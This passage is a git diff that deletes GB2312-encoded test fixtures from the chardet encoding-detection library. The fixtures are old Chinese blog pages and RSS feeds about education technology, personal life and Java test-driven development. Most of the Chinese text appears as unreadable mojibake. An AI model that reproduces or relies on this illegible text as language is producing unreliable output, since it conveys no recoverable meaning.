-minjuan -2005-09-04T02:08:06-05:00 - - -²»¸÷װנָ־µִ±א¼­ -http://blog.online-edu.org/minjuan/#005600 -·¢±ם־ִױֲַֻש׃׀ׁ§ץָֻµִׂ»´ףָ־־ס£¬»עױַ־ֳַֹׂת»מµִׂ»²¿·ײ¡£Publish or Perish! ױגׁש¾ֽׁר»מֱֻׂ»´ףֵתװ׃ײ¾÷ֽ±א¼­£¬ׂ²¸רױג׀©±א¼­ׂ»׀©ָ¨ֽ‏¡£ֳַֻ²»ֿ²»¶ִדµִ־ִױֲ£¬¿ּל÷°µ״¶¼ֳ»׃ֳ¡£´ף²¿·ײ±א¼­»¹²»´ם£¬׃׀ׂ»׀©ָ´ַ׀©²»¸÷װנµ«ְִ׃ֳָ¨ֽ‏µִֶ½׃¹ײ®±²¡£ ¹‎ָ¥ׂ»ִךְן£¬װֶֻר²»÷ֳ£¬׃צµ½ֱ½¸צ£¬ׂ»¸צױµ½¸ו׳׃ׁ¹׳ֵ²»¿´£¬²מµדµ¢־ףֱֻׁמ·«±ֿׂµ¡£ֱםׂ»¸צ£¬ׂ×־ׂ¸ִ÷¶א£¬װ³₪³ַ¸ִװ־ה÷÷¸ִ£¬ׁ¾¦¶¼ײ±ֱֻ¡£½ב¹ֻ°ׁ¾ֹµִֵֵָֹֿ¥ֱֻ£¬׃ײ»¨ֱֻ־ׂׂ»ֹֿ־חײ״׀ֲ±אֵֵ¡£ ָח¹־ׂ»¹ַ¸צ׃׀´ף°ׁ±¼הµִׁ§ֹת£¬¾ֽ°ױֱֻ£»ֶ«ֶ«־ׂµִַא´÷±ֳַָֻµִ´ײ׀ִײµַ®¡£µ«־×ֱֻ´ף¾ײ£¬»¹ַָָּט¸÷ײ״¡£µָ־ִױֲ·¢ֱֻ£¬±״¶¨׀´׀ֵµ½װ׃ײ¾ֹחָ¥µ¯ְֳַֻ¡£׃׀׀©ָֻ£¬׳ׂװ־×׳װ¼÷ַ´ףָֻ־ן£¬¿ֹׂװװ÷ף±²ֳזַ°־×ֻש׃־ס£ֶס²»ײ×½«ְ´µִּלֲֿ׳ַ÷ף±²µִ¡£70ִך´תµִָֻ£¬÷¿ל½«ַֹח»בµִײ׀ֱק¡£ֱ¬ֱֻׂקװ¢ׁװֹֿ¶¼ַױגֳ´ֻµµִ£¬ְֿף¿ֹׂװֹ±ְֻ´ףֿף£¬ַ§ֽע²»ׂ×µֳ׳ן׀¡ָֻ־ן¡£¼׃ײײ³₪¶¼±»ֳַָֻ»״ױֱֻ£¬÷־¿צׂ»¸צ׀¡׀¡װ׃ײ¾±א¼­¡£־ׂ¾ר²»ִַַײײׂ×±¨¸´µִָֻ£¬µװ¿´²»¹‎£¬־¬»₪ׂ»ֲֿׁ§ץ½חµִ¹«ױ‎¡£ֲ²»¹״¼÷¸¸¹ֶׂנµִ±´תׁׂ¾­¹‎ָ¥ֱֻ£¬²»¸÷װנָ־µִָֻ£¬װחװחֽםֽם»בװ׃°ֿלµ½ִד¡£... - -minjuan -2005-09-03T17:00:30-05:00 - - -ָ«ַע½ּ׃‎ֽרֹט¼ֱֱֱֶֹµַ³¡ -http://blog.online-edu.org/minjuan/#005599 -supported by the OITC Global Education Foundation. ־ׂµִׁ§ֹתBrettַ÷ְֳ³־כµֲִ¼ֿסײֶ׳קָֻ£¬²»ײ×µְֻ´׃ְִַן½ב¶ֱֻױגׂ»ֵתׂ×ֽ¶׳½ּ׃‎µִָֻ¡£Mission: to solve the most critical educational challenges throughout the world. ִ¿±ךַ½¨ׂ»¸צPortal, ּב¹©¿־³ּ£¬ׁ§ֿ°׳ֱֿ£¬÷ֽ¸קײײ׳װ´¡£¹׃ֳָֻ£÷ָ«ַעµְִֿ¦÷ֽׁ§ֹת£¬ׂװַׁײְֳ¹ת־×ײק¡£ֹט¼ֶֽ¶׳£÷80ֽע$$£»׳ֽ¶׳600ֽע¡£ ־ׂ׳װָ»³ֱַֹֻׁײ·½ֳזµֱִ×ֲחָֻ£¬׳יײ¯ֱֻ׳ֹׁ¯ײִֵַֽׂ£¬½»´ףµִֹךװ÷³₪£¬¦´ףµִ׃אְֿ¦װַׁכײ®ֱ׀¡£װ±±ְֳ£¬׳צ²ֳ´ֲַי¶¼ׂ×ַ®£¬²»ֿףײ׀¹ת£¬´ףׁ§µִµׁיׂ¾ֽ¿ֹׂװ׳ק³צ÷¶א´ףֿמִ¿£¬׃׀´ףֵתׁ׀¾¿ֹת¹±ֿ׳ֱ¦ֱ¿¡£ְֳ¹תָֻ£¬÷¶א±÷עװ״װ׀־½÷ֽ׀¡½ֹֿ£¬¶רַׂ׃׀´ףֱ¿׳½נְֻ·ׁװ³ן±¸÷ֽ¿×»בֹֿ¡£ֿ£ֽױג¸צֿמִ¿ֻ³ְ½ר׀׀£¬׳ֿעָ«ַע£¡... - -minjuan -2005-09-03T16:47:52-05:00 - - -¥µ״ַׁ¸חײֱ¢´ףׁ§½ּ׃‎¼¼ץֿµ -http://blog.online-edu.org/minjuan/#005572 -²ֵֿכֶנְ´,»¹ֳ»׃׀¸ר־ֳׂ´ֿµ׀´¹‎ֽרײ¾. ַכ¿´: http://edtec.sdsu.eduְֳ¹תְת·׳מ׃ֶ¾ֳµִ½ּ׃‎¼¼ץֿµײ®ׂ»,ֳֵֵַ°ָ‎. ¹²׃׀°ֳֻ½ּ£¨ַןּל»בױ׀ױֱ½ֳ£©£¬ֱ½¸צֻ¶¿program, ֶהײ׀ׂ»¸צַֽרֲ·ֻ¶¿£¬ׁ§ֹתְ´׳װְ½ח¸קµ״£®ָ‎¸צ²©¿°א£¬ױ‎װ³ן½¨ׂ»¸צֽךָ«ֽרֲ·µִ²©¿ׁ§־»£® ¿־³ּµ¼ִֽ׃ֳ,¡¡ְּׂמ±יּלֲֿ£¬°ְ¨°׳¹¬£¬¹ת»בֽ¼י¹£¬½»ֽ¨°²ָ«²¿£¬÷£¾£¬ֵµ»שַׁ£¬÷ָֽ«¹ת÷¶אָם¼‏÷ֵֽאׁµ¹«ֻ¾£® ±¾ֿµֳָֻ: Bernie Dodge, Allison Rossett ־»׃ְֳ¹ת׳מ÷ֳµִ³ַ׀£÷¥µ״ַׁ¸ח¡¡£¨San Diego), America's Finest City, ÷£ּ²£¬־ִ»¯£¬ֹת»¯¹₪ׂµ£¬÷ֽ´ףׁ§£®http://www.signonsandiego.com ³‎ֱֻ·¿¼¸ֹֿֿ¾ֹ½נֹ½ײ®ֽג£¬±נµִ¶¼÷÷ֳ£®... - -minjuan -2005-08-24T01:36:39-05:00 - - -E-Learning Conference (October) -http://blog.online-edu.org/minjuan/#005571 -http://www.aace.org ־ֲ¸ח»×£¬¼׃ֳִ´ףµֳִקײיײ®³ַ¡£־ֳַׂµִֻׁµַ: The Use of Blogs in Teaching, Knowledge Management, and Performance Improvement Abstract: The number of web logs (¡®blogs¡¯), or online personal journals, is on the rise. While this trend may reflect a human propensity for self-indulgent introspection, it may also be propelled by the many advantages of blogs.... - -minjuan -2005-08-24T01:26:30-05:00 - - - - \ No newline at end of file diff --git a/chardet/tests/GB2312/cappuccinos.3322.org.xml b/chardet/tests/GB2312/cappuccinos.3322.org.xml deleted file mode 100644 index f75a9b0..0000000 --- a/chardet/tests/GB2312/cappuccinos.3322.org.xml +++ /dev/null @@ -1,169 +0,0 @@ - - - - - - - Cappuccino Space - http://cappuccinos.3322.org - ָױ׳׃ָחֱקֹ³ װײ¸·ל¼הַב׃¯ ־ֳַׂׂ»ָחֱקֹ³ װ³¾ְ¼הֲ‏־ט - Copyright 2005 - Tue, 27 Dec 2005 01:08:26 +0000 - http://wordpress.org/?v=1.2.1 - - - ׃ך - http://cappuccinos.3322.org/index.php?p=135 - http://cappuccinos.3322.org/index.php?p=135#comments - Tue, 27 Dec 2005 01:08:26 +0000 - - ־ׂ׀ִ־ֿׂכ http://cappuccinos.3322.org/index.php?p=135 - ÷¾ֳ£¬÷¾ֳ -ײױ׃ֲֿ׃ךֱֻ£¬װֹֿ°אµֲִ·ֹֿ£¬÷צָ»±»ֱ½¸צ׃ךµד´עײ׀£¬ׂ»ײײִ×ֳµִֿ²װֳ׃ֶָ»¶רֹת£¬ -÷¶אֻ¼׀ק·÷ֶנ¡£ - http://cappuccinos.3322.org/wp-commentsrss2.php?p=135 - - - ¿……. - http://cappuccinos.3322.org/index.php?p=134 - http://cappuccinos.3322.org/index.php?p=134#comments - Sun, 25 Dec 2005 07:08:32 +0000 - - ־ׂ׀ִ־ֿׂכ http://cappuccinos.3322.org/index.php?p=134 - ³₪ֳִַ´´ףֱֻ£¬׳מֹמ¿ּµִׂ»´־ַ¿´׳ֲֵטֲט¿£¬ִַ±÷ע£¬־ׂ°²־¿ֻ‎ֻµ£¬ִד»¹µ£׀ִ²ֳ´£¬¼´¹²ֳ´¶¼ֳ»׃׀£¬¼´¹°ײ°ײ²»¹״׀ִִד£¬ִד»¹׃׀־ֳַׂ¼¸¸צ÷¢׳׃£¬־ֳַׂ¶¼³₪´ףֱֻ¡£ - -½סּל£¬־ׂ¶װ׳ִֵד¿ֱֻ¡£ִד°²־¿־ׂ£¬ֻµֲ‎ֲ‎½ּ£¬־ׂ»¨ֱֻ¼¸ִךµִ±÷עׂ²½ּ²»ֱֻ£¬װץֳ´°ל£¿ -»¹ִַַ¸צְֿµפְׁµִ־ּג£¬ַ®¡£ - -׃׀ַ®£¬׃׀·³ִױ£¬ֳ»ַ®£¬ׂ²׃׀·³ִױ¡£ - -¹״¼ַ¶®²»¶®½¼ף¡£ - http://cappuccinos.3322.org/wp-commentsrss2.php?p=134 - - - ¥µ®ֽם²ֽ÷ֳ§° - http://cappuccinos.3322.org/index.php?p=133 - http://cappuccinos.3322.org/index.php?p=133#comments - Sun, 25 Dec 2005 00:07:03 +0000 - - ־ׂ׀ִ־ֿׂכ http://cappuccinos.3322.org/index.php?p=133 - -־×ֱֻ»¶¶ָױג¸צ־ק·½µִ½ָױ£¬ׂ²²»ֳָ׳װ¼÷¸¸ִ¸ײף·¹ֱֻ£¬´ף¼ׂׂ»ֶנµ½ֽגֳז³װ°ֹ£¬½ב¹ֽםֹֿ¶ַ׳׃ֽ´ֱֻ£¬־ֱ¼µִֹּ¼ׂ¡£ - http://cappuccinos.3322.org/wp-commentsrss2.php?p=133 - - - ֲ·¹‎ - http://cappuccinos.3322.org/index.php?p=132 - http://cappuccinos.3322.org/index.php?p=132#comments - Tue, 13 Dec 2005 10:50:32 +0000 - - ־ׂ׀ִ־ֿׂכ http://cappuccinos.3322.org/index.php?p=132 - ½סּלµװּ«־ֱֱִֻ£¬´׃¼ְׂן׳³צְ´÷ף¿´µ½ׂ»¸צ׀ֲ½®ָֻװֹױ¿¾£¬׃ֲַעֱֻ5´®ׁעָג´®ְ´³װ£¬־¶µְ»¹²»´ם¡£±³װ±׳£¬ָ¥µ½ׂ»¸צ³¬׀ְןֳז£¬׳×ֱֻׂ»ָ¦£¬ֲעֱֱֻ½¸צװר¾­÷ֿ²»¶³װµִֻ®¹¡£ - -»״¼ׂµֲִ·ֹֿ»¹¹הֱֻׂ»¸צײ»תֹּµך£¬ױׂױׂ׃׀ֳ»׃׀־ֿׂ²»¶µִִַ¸צ£¬½ב¹»¹ױזױׂ²»µ½ִ״¡£ - -־ׂ¸רִד·¢ֱֻ÷¶א׀ֵֿ¢£¬°ׁ־ׂׂ»ֲ·µִ¾­¹‎¶¼¸זֱִֻֻד£¬¹‏¹‏£¬ִדָ´ֻµ־ׂװֽזִדִ״¡«¡« - -ֹµ¹ְֿ´µִ£¬־ׂ׃ֳײ»תֹֿµִֽרֲן£¬װץֳ´»בֶ­ִדִ״£¿£¿ - http://cappuccinos.3322.org/wp-commentsrss2.php?p=132 - - - ׀ִַי÷ֳ²מ°¡ - http://cappuccinos.3322.org/index.php?p=131 - http://cappuccinos.3322.org/index.php?p=131#comments - Mon, 05 Dec 2005 04:55:10 +0000 - - ־ׂ׀ִ־ֿׂכ http://cappuccinos.3322.org/index.php?p=131 - :cry:׀ִַיµֲֽהֱֻׂ»ּל£¬ָװָ»ֳ»׃׀»״¸´ -ױׂ²»µ½װ­ׂע£¬ײ»ִַ¬ִ¬µִ³׀׳ֵ£¬ -־ׂײ×µְ¹‎ֱ½ּל¾ֽ»ב÷ֳµִ£¬ - -ױג¼¸ּל¾ַֽױֱֻׂׂ»׀©mp3ְ´ּ‎ּ‎£¬·¢ֿײ¡¶ָח¹׃׀ׂ»ּל¡·»¹²»´ם - http://cappuccinos.3322.org/wp-commentsrss2.php?p=131 - - - ־ַֻׂ­£¿ - http://cappuccinos.3322.org/index.php?p=130 - http://cappuccinos.3322.org/index.php?p=130#comments - Sat, 03 Dec 2005 05:05:22 +0000 - - ־ׂ׀ִ־ֿׂכ http://cappuccinos.3322.org/index.php?p=130 - ·±»×µִ±³÷ף£¬׳ַ׃׀µד׃ַֹֻ¡£ -ֱד³¿µִ½ײµְֹֿ ·ַ³£°²¾²£¬»בֿכֶנ¸ױ²ֵ»°±נµִִַ¿ּ£¬ִד±§׳ֵ־ׂµִׁ־־ַׂ²»ַׂ×»״¼ׂ¡£ - -²»ַ²»¶®ִדµִ׀ִֻ¼£¬ַ÷¶א¶«־ק´ם¹‎ֱֻ¾ֽ²»»בװְ´ֱֻ¡£ -׃׀װµµִִָֻֿא¾ׂ»¿ּׁׂ¾­ֲת׳דֱֻ¡£ - - http://cappuccinos.3322.org/wp-commentsrss2.php?p=130 - - - Beverley Craven - Promise Me - http://cappuccinos.3322.org/index.php?p=129 - http://cappuccinos.3322.org/index.php?p=129#comments - Thu, 24 Nov 2005 13:19:02 +0000 - - ־ׂ׀ִ־ֿׂכ http://cappuccinos.3322.org/index.php?p=129 - You light up another cigarette -And I pour the wine -It¡¯s four o¡¯clock in the morning -And it¡¯s starting to get light -Now I¡¯m right where I want to be -Losing track of time -But I wish that it was still last night -You look like you¡¯re in another world -But I can read your mind -How can you ... - http://cappuccinos.3322.org/wp-commentsrss2.php?p=129 - - - ֳ־ֿכ - http://cappuccinos.3322.org/index.php?p=128 - http://cappuccinos.3322.org/index.php?p=128#comments - Wed, 23 Nov 2005 00:08:07 +0000 - - ־ׂ׀ִ־ֿׂכ http://cappuccinos.3322.org/index.php?p=128 - ½סװח¿´ֱֻ±¨ײ½£¬ְֳ¹תׂ»¸צֽׁ¿׀דµִֵ®ײק³ײ£¬´׃׳מְֳµִׂ»¸צ־ּגֵֹ®µ½½סּל׳מ³צֳµִײק³ײָֻ£¬ֻ‎µִ׳ף׃ֳׂת¾ַֽ£÷ָֻ¿ֹׂװַוֶ¶¡¢¼ט¿א£¬µ«²»ֳִ»׃׀ֳ־ֿכ£¬׃׀ֳ־ֿכ¾ֽ¿ֹׂװ¸ִ±ה׳װ¼÷µֳִװֻ¡£ - -ַ°¡£¬־ָׂ±µִ¾ֳַֽ־ֿכ£¬־ׂµֳִ־ֿכַ²ֳ´ִ״£¿ -¿´׳ֵֹם±ׂ»¸צֽ¬ֲµִ´ַײ°£¬²»µֳ²»ֵו·‏ֻµִ׃ֲֶר£¬־×ֱֳֻ־ֿכ£¬־×ֱֻ¸÷ֳµִֹת»מ¡£ - http://cappuccinos.3322.org/wp-commentsrss2.php?p=128 - - - ׃ײַׂ»¸צֱ¹ׂגֿ®ָֻµִָױ׳׃ - http://cappuccinos.3322.org/index.php?p=127 - http://cappuccinos.3322.org/index.php?p=127#comments - Sun, 13 Nov 2005 23:00:52 +0000 - - ־ׂ׀ִ־ֿׂכ http://cappuccinos.3322.org/index.php?p=127 - ¾­¹‎¼¸ּלµֳִֶָָ£¬½סװחײױ׃¿´µ½ֲםֲ·ֽג×הץהץµִ£¬׃׀µדֿס´÷ּלµִ¸׀¾ץ¡£ -¹ְ¼ֳֶ»׃׀¶א¾ֳ£¬ױגײײּלֶר»ב±הµֳװ½ְ´װ½ְהµֱִֻ£¬÷®¶¬ׂ×µ½ֱֻ¡£ - -½סּלױױֱֻׂ»ֲֿ¾µ׳׃£¬·¢ֿײ׳װ¼÷׃ײְֱֻֿ£¬ֻךװֲ²»ִָָֻ°¡¡£ -ִך¸´ׂ»ִך£¬ַא´÷¾ַֽױגֳ´»׃»פ׳ֵ¡£ - http://cappuccinos.3322.org/wp-commentsrss2.php?p=127 - - - µ±ֹתֳװִדײײ׀»¬ֲהµִ±÷ע - http://cappuccinos.3322.org/index.php?p=126 - http://cappuccinos.3322.org/index.php?p=126#comments - Sat, 29 Oct 2005 01:57:39 +0000 - - ־ׂ׀ִ־ֿׂכ http://cappuccinos.3322.org/index.php?p=126 - ½סּלװחֹֿ¿´µ½׃ד¸׳µִֻ®»ל׳ֱַֻ£¬´עֻד»»ׂ»ֲֻֿ®¡£ -5ּץְֿ»¢׃ד¾ֽױגֳ´ְָֻ¥ֱֻ¡£ -ַ־ׂµִ´ףׂג£¬װ­±¾»»ֻ®µִ²׳ק±ה³ַֹוֿ´׃ד¸׳£¬ -¿´ױגִַ׀©׃ד¶שװֻ®ײ׀ױץװת£¬ַֹתֳµִ´אָץ£¡ -¶װ²»ֶנ£¬£ֲֿµֱִ½¸צ׃ד¶ש£¬ַ־ׂ°ִׁדµִֽ¬°י¶ףֹ±ֱֻ£¬ -¿´ױג׃ד¸׳ײ׀ֶהֻ׃ד¶ש¶¼³ֱִ¬£¬־ׂ÷ִׁ¹‎¡£ -5¸צֹתֳ£¬¾ַֽױג5¸צֹתֳ£¡ֳָ־ׂ¸׀¾ץµ½ֿכ־ױ׳¡ִדµִ±÷ע£¬ -·¢ֿײ׳װ¼÷ָ´־ִ־×ֱ¦£¡ - http://cappuccinos.3322.org/wp-commentsrss2.php?p=126 - - - diff --git a/chardet/tests/GB2312/chen56.blogcn.com.xml b/chardet/tests/GB2312/chen56.blogcn.com.xml deleted file mode 100644 index 72eb2e7..0000000 --- a/chardet/tests/GB2312/chen56.blogcn.com.xml +++ /dev/null @@ -1,30 +0,0 @@ - - - - - chen56µִ¿×·¢ױָױײ¾ - http://chen56.blogcn.com - ױגִךֽ·ֻ­»¹ִµײµ²µֳ׳¡ֳפ½ױג¶«־ק¡£ִ¿ַ°¼¯ײ׀װ£÷²גװַ‎¶¯µֳִפ½·½·¨µ¼ש(xp־×ײק)£¬,open source framework,ִ£½£¬java,י¡£------³ֲֵפ£¬׳ק־×ׂ»ֳ¿סָָµִ³ּ׀עֿ£ֳֽ¿ׂ»ּל¶¼ִ³ֹ³₪½ר²½£¬²¢ֿ£ֽ׃כ´ף¼ׂ·ײֿם¿לְײ÷ֽײ×¶¡£ - - - - - - - - - - - - - - Blogcn.com - http://www.blogcn.com - http://www.blogcn.com/v2/logo.gif - - °ב¼ׂ http://www.blogcn.com/user3/chen56/blog/1629279.html
    ::URL::http://iseeisee.blogdriver.com/index.jsp (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    pico÷ֽwebwork¼¯³ֹ http://www.blogcn.com/user3/chen56/blog/1148943.html http://my.6to23.com/chen56/pico/

    ױג¸צ־ִױֲ¸ח¼¸¸צ°ןֹףֹף£¬ֳ»־ּג¾ֽ·¢huihooֱֻ (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    test link http://www.blogcn.com/user3/chen56/blog/470893.html http://c2.com/cgi/wiki?acceptancetest

    ::URL::http://www.dotspace.twmail.org/Test/AboutTest.htm (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ָם¼‏¿×·¢ָֻװ±ַ¹₪³ּ¦ֲנ£¿־ֳַׂ׀טׂ×±אֲכ¹₪ֲָֻנ? http://www.blogcn.com/user3/chen56/blog/453740.html
    ֵ¶£¬ֶֻהµ÷¼עµ¥£÷ָם¼‏¿×·¢ָֻװ±ַ¹₪³ּ¦ֲנ£¿ֶהײ׀µִ»ש´¡ַ£÷¹₪³ּ¹‎³ּµִ׳מײױ½ב¹ַ־ִµµ£¬¶רֶהָֻֻ¸ש¾ױג׀©־ִµµָ¥ײֶװלµ־ן¡£ֶהׂ‎ֹךµִ־ּג´נ°¸ַ£÷³‎ֱֻ¹‎³ּײ׀µִ±״ׂ×־ִµµ£¬װ´´תֲכ²ֵַ־¨ׂ»µִָם¼‏־ִµµ£¡

    ¸׀׀»¡¶ֳפ½ָם¼‏¿×·¢£÷װ­װע¡¢ִ£½׃כµ¼ש¡·¸½ֲ¼ײ׀ׂ‎׃ֳµִJack W.Reevesµֲִ־ִ,ֳָ־ָֿׂכ³ֱֻ¼£¬ַֻ÷¶אְ§»ףµִ־ּגµִׂ»¸צ׃׀ָ₪µִּב¾£¬¿ֹֿ§µִַױגֶ×ֲ־ִ׀´׃1992ִך£¬¶ר־ׂװ11ִך÷ף²ֵ׃׀׀ׂ¶ֱµ½ֻ¡£ױגֶ×ֲ־ִ¸רֱֻ־ֳֳַׂפ½·½·¨ׂ»¸צױׁ§ֹֿµְִׂ¾.

    ־ׂׂ²ׂ×¼ּ׀רµ¼שֻ£÷ׂװ´תֲכ־×ײ׀׀ִµִ²גװַ‎¶¯µֳִפ½·½·¨¡£ (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ¹״׃¹₪׳קֱק http://www.blogcn.com/user3/chen56/blog/449009.html "lu jam" <javailoveyou@hotmail.com> 
    ֲם÷ל־° mahongwei@hytj.com


    ׂע־×׃׀׀©¸חֳַ¿´µ½־ׂµִjbpm,ofbizµִ·¢ׁװ,ֿ£ֽ÷ֽ־ׂ½ר׀׀ֹמָכµִּײֲ,
    ֶהµ,ׂע־×־ׂµִ¿×·¢¼ֶ»®ׁׂ¾­ײױײ¹(ֿמִ¿ֽ£µפֱֻ),־ׂׂ²·ֵֶתֱֻworkflow
    µִּ½ֻק,µ«3ײ׳ף׃ׂµִּ½ֻק,ֳָ־ׂׂ²׃׀ֱֻׂ»׀©ָֿ¶,׳ָֻֿµׂ»ֲֿֿא¹״׳ֱֿ:

    ******************
    ***¹תִָָּײֲ
    ******************
    ::URL::http://www.dqpi.com
    ::URL::http://www.jdon.com

    ****************************************
    ***ײµµֳ׳¢ׂגµִ¼¸¸צ¹₪׳קֱקׂ‎ַזsf.net
    ****************************************
    sf.netײµµֳ׳¢ׂגµִ¼¸¸צ¹₪׳קֱקֿמִ¿:
    osworkflow
    ofbiz
    obe
    jbpm
    »¹׃׀¼¸¸צּ״±נ׀¡׀ֽ÷ֽ¾«ײֲµִ¹₪׳קֱקׂ‎ַז(¿ֹֿ§ֳ»±¼ה¿´ֱֻ)

    ****************************************
    ***sf.netֲֿµִ¹״ (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ױג³¡׀ֲׂ»ֲײµִײ׀ָױױ½ױש¾¿¾¹ֻ­ַ₪ױ http://www.blogcn.com/user3/chen56/blog/431803.html ָח¹ִדװר¾­²־¼׃»עױ‎װ²־¼׃£¬ִִַדׂ»¶¨ֳק°׳ױגײײ׀ֻ·£¬²»¹גַ³נ÷£¬
    ²»¹גַ°®¹תײקׂו£¬÷ֳֿף׳׃׀׀©¹ײ־¶µְ£¬ֹםװָ÷ּוײ׀µִָֻ°ׁױגײײ־¶µְ²»¶ֿµִ
    ´«²¥£¬±¬·¢¡£

    ¿ַֹ£¬¾¿¾¹ֻ­ַ₪ױ¡£ 
    (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ֶׂ¶¯׃¦׃ֳµִֹטֿכ http://www.blogcn.com/user3/chen56/blog/378991.html

    ¶¨־»¡°ֶׂ¶¯¶¨־»¡±
    ::URL::http://www.wx800.com/msg/2003/09/25/d18736.php
    »¥ֱ×ֽר¶ּ׀ֵֽר¹״½׃¿׀­ׂי£¨V3.0.0£©
    ::URL::http://skybird.9s9s.com/upload/upfile/200310241546090.rar  
    (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    flash? ´תּזjavaµִֽ¼׀־½חֳז£¿ http://www.blogcn.com/user3/chen56/blog/370212.html ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]> jgraphּ«ֱִֻׁ£¬¶װ׃־ְׂ´ֻµ http://www.blogcn.com/user3/chen56/blog/354352.html µ«ֳקּל¾ֽׂ׸ר¿ֽ»§¿´demoֱֻ£¬־ׂ½סּל»¹װׁ׀¾¿ֻ£¬ֳקּלײ»ִ¸רֳַֻ¿´ׂ»¸צ¼עµ¥µִֽ¼׀־demo,ֿא±ָ¶רׁװjgraphT¾ֳָָֻֽ÷ָׂ׳¹׃ֳ£¬¶רַֻׂׂ²ַ²גװַ‎¶¯¿×·¢µִ£¬ֻהָ»ֳ»׃׀־ִµµ£¬µ«־ׂ¿´testCase±ָ¿´־ִµµ»¹¶®µֳ¿ל£¬¿ֹֿ§ַֻjgraphµִׂ»¸צׂ׳׃ֳ׀װ°׳°£¬viewµִµקױ»¹ַׂ×·ֳ־jgraph,ױזֿ£ֽjgraphTֵֽ¶׃°ׁjgraphײ״׀ֲ¿×·¢ׂ»ֲֿ£¬־ֳַׂױזµ״׀טׂ×20%ׂװֹֿµִ¹¦ֲִנ£¿־ׂ¿´־´±״£¬¼עµ¥ַ־ׂ°®¡£ (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]> ׂ»¸צװ­װע÷ֽׂ»¸צֶָקµְִֻ»¨-picocontainer ioc3(µ¹ײֳ¿״ײֶװ­װע) http://www.blogcn.com/user3/chen56/blog/349528.html ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]> ²גװַ‎¶¯µֳִפ½·½·¨µ¼ש http://www.blogcn.com/user3/chen56/blog/340541.html ֳָ־ׂ¾ץµֳ׳װ¼÷ַ·ס׃׀ֱֻ²¡£¬ׂע־×·¢ֿײִִ¸צframeworkֳ»׃׀²גװ´תֲכ£¬־ׂ¾ֽ׀ְִם²»ִ¸÷µ££¬ֹץײֱ²»ִּבֶנ׀ָֻ₪ָ¥׃ֳֻ¡£

    µ±¿×¼װ׳ֵ׃¦׃ֳֳפ½·½·¨÷ף...
    ־ׂװר¾­ֱ¬׀ר3ּלׂװֹֿ²»¶ֿµִ»­umlֽ¼£¬²¢ַׂ²»¶ֿµִֿע±נָֻ׀½²´ֻײ׀°ֲֳ״,½ב¹׳ַ׃ײ²תֹתֱֻׂ»¶ׁ¹‎·ײֹט¼ֶµְִ¬»ר´תֲכ£¬¿ֹ־ָׂװ¹ּײ´µִָֿ־×ַ־ׂµִ»ז»­¼¼ַֹ²»÷ֳֻשײֲ¡£
    ־ׂ¶װױגײײ"ֹט¼ֶ"µִ׀׀־׸׀µ½¼¹±³ֹֿײ±ֳ°ְה·ח¡£

    ־ׂ½׀־ׂµִױגײײ²¡־×£÷¹‎·ײ׃ה¿ל²גװ׃כֳפ½׳÷ֿײ¢¡£


    (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    ¹״׃½סּל»בׂי-¶«ָם°¢¶«ָם http://www.blogcn.com/user3/chen56/blog/293314.html
    1.²גװµִױשֲ

        »בֹּֿבµ½ֱֻ²גװµִ־ּג£¬ְֿ׳ׂ²±ם´ןֱֻ¶װ²גװµִ¹״׳¢£¬־ׂׂ²ֿל׃¦ְֿ׳µִ"¶א־×¹«ֻ¾ָם¼‏¿×·¢³צִ±»®²"µִ÷ֵ½ַ¶ר¿¶¿®³ֲ´£¬ֻֻµֱֻ¹״׃ׂ‎ָכ׳װ¶¯²גװ(²גװַ‎¶¯µִ¿×·¢,²¢·ַµ3·½²גװ²תֶ·)µִ¿ִֹ¼ֹט¡£ֵ¶ֵ¶£¬¿ֹֿ§ְֿ׳²»ֲתׂג£¬°¥£¬ׂ²ִׁ¹ײ£¬־ֳַׂµח׳׃ֹּ־ס׳יµִ"ioa"µװַֿסְֿ׳ֻשֻµµִ"ִַ־ײִ×ִדֳַµִoaֿמִ¿»¹ִַׁש"£¬¸ק־»¿´¹¿ִֹ»ב־,"ִַׁש"ִִַׁש£¿ׂ»¸צ׳ײ"²מ"¡£¿ק־ֳַׂ»¹׃ֳjavaװ׳ק¿×·¢(¹״׃javaµִ־ּגֲֳֿז»¹׃׀ֲצ)£¬־ׂױזµִ־ׁװׂװ¶װֱֻ£¬²ְׁ¢¡£
        ¿ַֹ־ׂ»¹ׂ×ֻµ£÷²גװַ‎¶¯µִ²גװ·½·¨ַ¿ֹ׀׀µִ¡£ׂע־×ױג²»ַׂ»¸צ²גװַ‎¶¯µִ¿×·¢·½·¨µִ½ּ³ּ£¬ֻשׂװ־ׂײ»ּב¹©ֲֳֿזµִ·½·¨¸ר´ף¼ֱֻׂ½גֻ£÷
    ַכװgoogleֹֿהָכ"²גװַ‎¶¯",ִד»בױׂµ½17ֽעּץײ׀־ֱִ¬½׃£¬ֹֿµ£¬ײ׀־ֱִ¬½׃¾ֽ17ֽעּץ¡£
    ¶רַׂ10·ײײ׃ַ°־ׂ»¹ײ¸µ¼־ֳַׂµִ׀ֲָֻµ¼שֱֻֻ¡£

    2.»בׂי¹‎³₪

        ־ֳֶַׂױ±י¾ץµֳ»בׂיּ«³₪£¬ױג¿ִֹ׃׀µדּפ´ּµִֿ׃ֹׂ£¬µ«µ¼ֹֿ÷¶אָֻ¶¼װ²»ֽ£µִ¿´±ם£¬ֻהָ»´ף¼ׂ½סּל¶¼ֳ»²ִ×ֲ¡£
    »בׂי½ג¾צµִ־ּג׀§ֲ½ֿµֽ£¬»ש±¾ֹֿ½סּל (ה¯ְְָ«־ִ  ׂ‎׃ֳ´ֻ־ִ)]]>
    open source¹₪׳קֱקׂ‎ַזּ½ֻק - jbpm.sf.net http://www.blogcn.com/user3/chen56/blog/291965.html 1.ֲֿװ״:jbpm-1.0-beta5.2.zip
